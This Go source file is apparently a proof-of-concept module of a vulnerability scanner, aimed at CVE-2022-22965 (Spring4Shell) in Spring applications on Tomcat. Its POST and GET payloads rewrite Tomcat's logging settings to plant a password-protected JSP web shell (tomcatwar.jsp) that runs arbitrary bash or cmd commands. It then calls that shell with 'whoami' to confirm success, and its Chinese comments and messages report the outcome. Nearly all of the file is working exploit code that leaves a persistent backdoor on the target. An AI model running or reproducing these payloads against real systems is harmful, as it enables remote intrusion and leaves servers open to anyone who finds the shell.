package poc

import (
	"fmt"
	"github.com/fatih/color"
	"ssp/common"
	"strings"
	"time"
)

func CVE_2022_22965(url string, proxyURL string) {
	Headers_1 := map[string]string{
		"User-Agent":   common.GetRandomUserAgent(),
		"suffix":       "%>//",
		"c1":           "Runtime",
		"c2":           "<%",
		"DNT":          "1",
		"Content-Type": "application/x-www-form-urlencoded",
	}

	payload_linux := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22bash%22,%22-c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	payload_win := "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(new String[]{%22cmd%22,%22/c%22,request.getParameter(%22cmd%22)}).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	payload_http := "?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
	getpayload := url + payload_http

	for _, payload := range []string{payload_linux, payload_win} {
		// 使用 MakeRequest 发送 POST 请求，传递代理URL
		_, _, err := common.MakeRequest(url, "POST", proxyURL, Headers_1, payload)
		if err != nil {
			return
		}
		time.Sleep(500 * time.Millisecond)
	}

	// 使用 MakeRequest 发送 GET 请求，传递代理URL
	_, _, err := common.MakeRequest(getpayload, "GET", proxyURL, nil, "")
	if err != nil {
		color.Yellow("[-] %s 请求失败，跳过漏洞检查\n", url)
		return
	}
	time.Sleep(500 * time.Millisecond)

	// 检查漏洞
	testUrl := url + "tomcatwar.jsp?pwd=j&cmd=whoami"
	resp, body, err := common.MakeRequest(testUrl, "GET", proxyURL, nil, "")
	if err != nil {
		fmt.Println("Error checking status code:", err)
		return
	}

	if resp.StatusCode == 200 && strings.Contains(string(body), "pwd") {
		common.PrintVulnerabilityConfirmation("CVE_2022_22965", url, url+"tomcatwar.jsp?pwd=j&cmd=whoami 空白页面多访问几次即可", "5")
		common.Vulnum++
	} else {
		color.Yellow("[-] %s 未发现CVE-2022-22965远程命令执行漏洞\n", url)
	}
}
